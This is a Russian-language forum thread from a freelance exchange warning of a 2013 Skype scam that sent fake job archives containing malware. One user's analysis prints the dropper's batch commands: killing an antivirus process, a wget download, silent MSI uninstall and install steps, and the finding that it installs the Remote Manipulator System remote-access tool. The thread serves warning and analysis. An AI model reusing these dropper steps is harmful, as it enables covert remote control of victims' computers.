Осторожно! Вирусы в Skype

Добрый день.Добавился сегодня человек skype: stomat1980 якобы по проекту с веблансера,я попросил ссылку на что он ответил,зачем Вам?И скинул ТЗ архив с файлом .exe.Будьте аккуратны,это развод.

lagutin, пожалуйста, сообщите дату и время обращения мошенника.

16.10.2013 ,примерное время 15-30 по Киеву.Я просто удалил его сразу из скайпа.Имя скайп "..." даже нет имени.

lagutin, К нам тоже обратились сегодня, формат .scr, модифицированный троян. Сейчас выясняем внутреннее содержимое с целью получения адресов куда и кому программа должна отправлять какие то данные.

Обращение в 16:07 по МСК

PerfectoWeb, Я не стал открывать даже,от греха подальше как говорится...

Аккаунт мошенника обнаружен и блокирован.
Мошенник мог отправлять вирус также следующим пользователям:
bezlepkina, PerfectoWeb, LGPgroup, san-francisco, art_Alex_Z, FanDes, AndriyPro, sozidai, AlexKantegro, WebMatrix, TOPSECRET, colorit_design, Mochulskiy, creative_dima.

Пожалуйста, будьте внимательны.

lagutin, Да открывать "естественным путем" не стоит ) Особенно под Win OS
Weblancer, Спасибо!

Вот интересно, после этого еще будут недовольные кнопочкой "показать контакты"?

Кому интересно, это модифицированный 7z архив, внутри:

Содержимое DOC119.docx - обычный документ, который открывается после запуска визуально

Содержимое install.cmd

@echo off

start DOC119.docx

@taskkill /f /im anvir.exe

@wget.exe посилання

start Adobe.Flash.Player.20.0.scr

Сайт разработан на Joomla )

floppox, Елена, так если бы только в кнопке дело было.
Спасибо сервису за безопасность, но у многих аккаунты на других биржах, свои сайты и везде контакты открыты.
Так что конкретная фишка эффективна от недалеких мошенников «работающих» здесь. Но и за это спасибо, конечно.

Скачиваем файл по ссылке Adobe.Flash.Player.20.0.scr, который должен был скачать предыдущий пакет после запуска.
Тоже самое, 7z архив переименованный в .scr

Содержимое архива на скрине.

Содержимое файла install.cmd

@chcp 1251

if exist "%ProgramFiles%\Common Files\rfusclient.exe" goto 1

goto end

:1

exit

:end

mkdir "%ProgramFiles%\Common Files"

copy winmm.dll "%ProgramFiles%\Common Files" >nul

if exist "%ProgramFiles%\Common Files\winmm.dll" goto end2

exit

:end2

@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

@MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress

@ping 127.0.0.1

@MsiExec /I "system32.msi" /qn

PerfectoWeb, вы клевые. А для особо одаренных, что этот вирус делает, какое зло причиняет?

Содержимое system32.msi

Summer_Rain, Пока не знаю Александр, вот хочу найти какие то электронные адреса или что то другое полезное. Он скорее всего крадет какие-то важные(финансовые) данные и отправляет кому то, или же заражает PC для других целей

В некоторых файлах нашлись следующие данные:

Сайт: rmansys . ru файлы которого скрипт устанавливает похоже.

Устанавливает драйвер setupdrv.exe
uvnc . com/features/driver.html

Устанавливает (потом запускает) файл srvinst.exe - ru.systemexplorer . net/file-database/file/srvinst-exe

VALUE "CompanyName", "TektonIT"

VALUE "FileDescription", "RMS unit"

VALUE "FileVersion", "5.5.0.0"

VALUE "LegalCopyright", "Copyright © 2013 TektonIT. All rights reserved."

VALUE "LegalTrademarks", "TektonIT, Remote Manipulator System"

VALUE "ProductName", "Remote Manipulator System"

VALUE "ProductVersion", "5.5.0.0"

VALUE "Comments", "Remote Manipulator System unit"

------------------------------
По моим предположения уже ясно, что устанавливает программу для удаленного доступа. Ну а там уже сами зайдут в режиме file manager и будут искать полезную информацию.

Всегда завораживала тема вирусов, как говорят, такую силу да в мирных целях.
Давид, спасибо за дополнительную информацию.

Summer_Rain, Да пожалуйста)

PerfectoWeb, ссылки только поудаляйте.

frig, Так нормально?

PerfectoWeb, вроде норм. А то мало ли что на этих сайтах может быть. Еще зайдет кто-то по ссылке.

frig, Верно. Ну я на всякий случай уведомил владельца того сайта (если он не соучастник), что там вирусный файл.